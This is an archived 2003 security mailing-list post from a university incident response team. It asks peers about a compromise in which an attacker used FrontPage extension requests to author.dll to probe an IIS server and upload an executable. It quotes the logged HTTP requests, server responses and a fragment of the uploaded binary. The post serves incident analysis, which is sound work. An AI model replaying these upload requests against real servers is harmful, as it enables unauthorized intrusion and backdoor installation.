We had a recent compromise that our IDS did not detect, however, it did detect subsequent backdoor activity and a few other packets afterwards that alerted us to the compromise. Upon closer investigation of the activity, some of the additional information logged showed some frontpage extensions being used in an interesting way. Anyone else seen this? Since we were unable to determine the initial compromise method, I'm trying to figure out if this was purely used as a backdoor, or might also have been the same method as the initial compromise. Some additional background info; the svchost.exe is a renamed servu ftp daemon process that was loaded into the server along with a few other, 'normal' backdoor tools. -- Jordan Wiens UF Network Incident Response Team (352)392-2061 ATTACK: --------------- POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 Date: Tue, 01 Jul 2003 20:33:10 GMT MIME-Version: 1.0 User-Agent: MSFrontPage/4.0 Host: aaa.bbb.ccc.ddd Accept: auth/sicily Content-Length: 112 Content-Type: application/x-www-form-urlencoded X-Vermeer-Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive Cache-Control: no-cache method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&listHiddenDocs=false&listLinkInfo=true SERVER RESPONSE: --------------- HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Tue, 01 Jul 2003 20:30:02 GMT HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 01 Jul 2003 20:30:02 GMT Connection: close Content-type: application/x-vermeer-rpc X-FrontPage-User-Name: IUSR_MACHINE <html><head><title>vermeer RPC packet</title></head> <body> <p>method=getDocsMetaInfo:4.0.2.4715 <p>document_list= <ul> </ul> <p>failedUrls= <ul> <li>svchost.exe </ul> </body> </html> Additional session.... ATTACKER: --------------- POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 Date: Tue, 01 Jul 2003 20:33:29 GMT MIME-Version: 1.0 User-Agent: MSFrontPage/4.0 Host: aaa.bbb.ccc.ddd Accept: auth/sicily Content-Length: 2142969 Content-Type: application/x-vermeer-urlencoded X-Vermeer-Content-Type: application/x-vermeer-urlencoded Connection: Keep-Alive Cache-Control: no-cache SERVER: --------------- HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Tue, 01 Jul 2003 20:30:21 GMT ATTACKER: --------------- method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dsvss%2eexe%3bmeta%5finfo% 3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fch ecked%5fout=false MZP@!L!This program must be run under Win32 $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS htM=[s . . Additional raw data. . ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Jul 03 2003 - 08:18:56 PDT